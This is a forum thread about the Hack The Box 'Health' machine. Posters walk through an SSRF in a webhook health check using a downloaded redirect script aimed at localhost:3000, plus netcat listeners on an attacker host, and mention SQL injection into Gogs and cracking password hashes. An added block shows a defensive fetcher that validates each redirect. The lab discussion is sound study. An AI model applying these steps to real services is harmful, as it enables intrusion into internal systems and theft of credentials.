Health - HTB [Discussion]
No, it's just SSRF
Reply
I got this: 

2014 GoGits · Version: 0.5.5.1010 Beta


I want to try: https://www.exploit-db.com/exploits/35238

but can't redirect all that request :s
Reply
(August 20, 2022, 10:53 PM)Hacker2222 Wrote:
(August 20, 2022, 10:46 PM)d3ext Wrote: How do you access the content of the port 3000?


redirect health check to localhost:3000 then payload has html



I'm redirecting to localhost, how do I get to the payload?
Reply
(August 20, 2022, 10:53 PM)Hacker2222 Wrote:
(August 20, 2022, 10:46 PM)d3ext Wrote: How do you access the content of the port 3000?


redirect health check to localhost:3000 then payload has html

Can you explain a little better how to do it?
Reply
(August 20, 2022, 11:16 PM)unamedstaff04 Wrote:
(August 20, 2022, 10:53 PM)Hacker2222 Wrote:
(August 20, 2022, 10:46 PM)d3ext Wrote: How do you access the content of the port 3000?


redirect health check to localhost:3000 then payload has html

Can you explain a little better how to do it?


I'm using this method:
Payload URL: http://10.10.xx.xx:4444
nc -lvnp 4444


Monitored URL: http://10.10.xx.xx

To bypass filter: use https://gist.github.com/shreddd/b7991ab491384e3c3331
python2 redirect.py --port 80 --ip 10.10.xx.xx http://127.0.0.1:3000


Under what circumstances...
Always

and get the response json on netcat listener
Reply
(August 20, 2022, 11:29 PM)d3ext Wrote:
(August 20, 2022, 11:16 PM)unamedstaff04 Wrote:
(August 20, 2022, 10:53 PM)Hacker2222 Wrote:
(August 20, 2022, 10:46 PM)d3ext Wrote: How do you access the content of the port 3000?


redirect health check to localhost:3000 then payload has html

Can you explain a little better how to do it?

download https://gist.githubusercontent.com/shreddd/b7991ab491384e3c3331/raw/57a633529ce4f495aae25d6270b379f1d3ea6fd5/redirect.py
execute: sudo python2 redirect.py --ip <LHOST> --port 80 http://127.0.0.1:3000
in other window execute: nc -nlvp 9001

Now in the web you have to enter "http://<LHOST>/" as Monitored URL and enter "http://<LHOST>:9001/" as Payload URL so it will check the port 9001 of your machine, which is open so it sends a request to http://<LHOST>/ and it redirects to the Gogs page and returns the content of the 3000 port to your netcat listener in port 9001


With nc -klnvp 9001 > response.json I got the Gogs HTML, but how can I see the Gogs page in the browser? Because it's useless like that.
Reply
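
Added example, not part of any post in this thread: the posts above describe a filter on the Monitored URL being bypassed by a redirect to 127.0.0.1:3000, so this sketch shows the defensive counterpart, a health-check fetcher that validates every redirect hop. The host name `status.example`, the sample address and the `fake_*` helpers are constructed assumptions so it runs offline.

```python
import ipaddress
from urllib.parse import urljoin, urlsplit

class BlockedTarget(Exception):
    """A hop in the request chain points at a disallowed destination."""

def validate_target(url, resolve):
    """Allow only http(s) URLs whose host resolves exclusively to public IPs."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise BlockedTarget(f"unsupported URL: {url}")
    for addr in resolve(parts.hostname):
        if not ipaddress.ip_address(addr).is_global:
            raise BlockedTarget(f"{url} resolves to non-public address {addr}")

def safe_fetch(url, fetch, resolve, max_hops=3):
    """Follow redirects by hand so every hop is validated, not just the first."""
    for _ in range(max_hops + 1):
        validate_target(url, resolve)
        status, headers, body = fetch(url)  # fetch must NOT auto-follow redirects
        if status in (301, 302, 303, 307, 308) and "Location" in headers:
            url = urljoin(url, headers["Location"])
            continue
        return status, body
    raise BlockedTarget("too many redirects")

# Constructed sample data so the example runs offline (hypothetical names).
FAKE_DNS = {"status.example": ["93.184.216.34"]}
FAKE_RESPONSES = {
    "http://status.example/ok": (200, {}, "up"),
    "http://status.example/": (302, {"Location": "http://127.0.0.1:3000/"}, ""),
}

def fake_resolve(host):
    # IP literals resolve to themselves; names come from the constructed table.
    return FAKE_DNS.get(host, [host])

def fake_fetch(url):
    return FAKE_RESPONSES[url]

if __name__ == "__main__":
    print(safe_fetch("http://status.example/ok", fake_fetch, fake_resolve))
    try:
        safe_fetch("http://status.example/", fake_fetch, fake_resolve)
    except BlockedTarget as exc:
        print("blocked:", exc)
```

In a real deployment the HTTP client should connect to the exact address that was validated, otherwise a second DNS lookup can return a different answer than the one that was checked.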
I've got a SQL injection in the Gogs server through SSRF, but I'm struggling figuring out how to leverage it; the password hashes are pbkdf2-sha256 and we seem to be in a container that prevents remote code execution.
Reply
What SQL payload did you use, if you don't mind me asking?
Reply
(August 21, 2022, 01:16 AM)ashleykitty Wrote: I've got a SQL injection in the Gogs server through SSRF, but I'm struggling figuring out how to leverage it; the password hashes are pbkdf2-sha256 and we seem to be in a container that prevents remote code execution.


What SQL payloads have you used and where have you passed them? If you don't mind.
Reply
Never mind. I got user; gotta crack that hash once you figure out how to format it.
Reply

